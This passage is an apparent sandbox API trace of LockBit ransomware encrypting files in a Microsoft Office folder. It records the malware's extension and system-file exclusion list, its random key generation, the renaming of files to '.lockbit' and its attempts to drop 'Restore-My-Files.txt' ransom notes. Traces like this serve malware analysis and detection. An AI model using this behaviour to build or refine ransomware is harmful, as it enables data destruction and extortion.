dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.176] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd18c4200, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc8dfee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd18c4200, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14529_.GIF", cAlternateFileName="")) returned 1 [0203.176] lstrcmpiW (lpString1=".", lpString2="BD14529_.GIF") returned -1 [0203.176] lstrcmpiW (lpString1="..", lpString2="BD14529_.GIF") returned -1 [0203.176] PathFindExtensionW (pszPath="BD14529_.GIF") returned=".GIF" [0203.176] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.176] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.176] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.176] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.176] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.176] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.176] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.176] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.176] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.176] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.177] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.177] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.177] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.177] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.177] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.177] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.177] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.177] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.177] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14529_.GIF") returned 1 [0203.178] lstrcmpiW (lpString1="ntldr", lpString2="BD14529_.GIF") returned 1 [0203.178] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14529_.GIF") returned 1 [0203.178] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14529_.GIF") returned 1 [0203.178] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14529_.GIF") returned -1 [0203.178] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14529_.GIF") returned 1 [0203.178] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14529_.GIF") returned 1 [0203.178] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.178] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14529_.GIF") returned=".GIF" [0203.178] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.178] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.178] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.179] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.179] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14529_.GIF.lockbit") returned 78 [0203.179] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14529_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14529_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.180] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.180] malloc (_Size=0x40068) returned 0x3df0008 [0203.180] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=274) returned 1 [0203.180] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.180] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.180] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.181] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.184] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14529_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14529_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.184] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.184] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.184] free (_Block=0x1fa2ed8) [0203.184] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14529_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.184] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.184] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd18c4200, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc8dfee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd18c4200, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0x13c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14530_.GIF", cAlternateFileName="")) returned 1 [0203.184] lstrcmpiW (lpString1=".", lpString2="BD14530_.GIF") returned -1 [0203.184] lstrcmpiW (lpString1="..", lpString2="BD14530_.GIF") returned -1 [0203.185] PathFindExtensionW (pszPath="BD14530_.GIF") returned=".GIF" [0203.185] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.185] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.185] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14530_.GIF") returned 1 [0203.186] lstrcmpiW (lpString1="ntldr", lpString2="BD14530_.GIF") returned 1 [0203.186] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14530_.GIF") returned 1 [0203.186] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14530_.GIF") returned 1 [0203.186] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14530_.GIF") returned -1 [0203.186] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14530_.GIF") returned 1 [0203.186] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14530_.GIF") returned 1 [0203.186] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.186] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14530_.GIF") returned=".GIF" [0203.186] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.186] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.186] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.187] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.187] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.187] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.187] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.187] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14530_.GIF.lockbit") returned 78 [0203.187] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14530_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14530_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.188] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.188] malloc (_Size=0x40068) returned 0x3df0008 [0203.188] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=316) returned 1 [0203.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.189] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14530_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14530_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.192] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.192] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.192] free (_Block=0x1fa2ed8) [0203.192] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14530_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.192] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.193] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2bd6f00, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc906040, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd2bd6f00, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0xf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14531_.GIF", cAlternateFileName="")) returned 1 [0203.193] lstrcmpiW (lpString1=".", lpString2="BD14531_.GIF") returned -1 [0203.193] lstrcmpiW (lpString1="..", lpString2="BD14531_.GIF") returned -1 [0203.193] PathFindExtensionW (pszPath="BD14531_.GIF") returned=".GIF" [0203.193] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.193] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.193] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.194] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.194] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14531_.GIF") returned 1 [0203.194] lstrcmpiW (lpString1="ntldr", lpString2="BD14531_.GIF") returned 1 [0203.194] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14531_.GIF") returned 1 [0203.194] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14531_.GIF") returned 1 [0203.194] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14531_.GIF") returned -1 [0203.194] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14531_.GIF") returned 1 [0203.194] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14531_.GIF") returned 1 [0203.194] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.194] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF") returned=".GIF" [0203.194] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.194] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.194] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.194] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.194] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.194] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.194] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.195] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.195] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.195] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.195] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.195] lstrcmpiW 